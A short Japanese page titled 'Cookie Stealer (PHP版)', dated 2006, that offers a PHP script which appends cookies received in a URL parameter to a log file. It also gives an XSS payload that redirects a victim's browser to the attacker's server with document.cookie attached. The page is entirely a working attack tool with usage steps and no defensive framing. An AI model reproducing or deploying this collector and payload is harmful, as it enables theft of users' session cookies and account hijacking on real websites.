Cookie Stealer (PHP版)
更新履歴
- 2006/11/28 初版
- Author kikuzou
概要
- XSSの問題を利用してクッキー情報を盗むためのPHPスクリプト
スクリプト
stealer.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookies11.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
使用方法
- 以下のように使用する。(表示の都合上2行になっているが実際は1行)
http://www.example.com/hoge.php?huga= <script>window.location='http://<サーバ名>/stealer.php?cookie='%2bdocument.cookie;</script>
- 取得したクッキー情報については「stealer.php」と同一ディレクトリ内の「cookies11.txt」に保存されている。
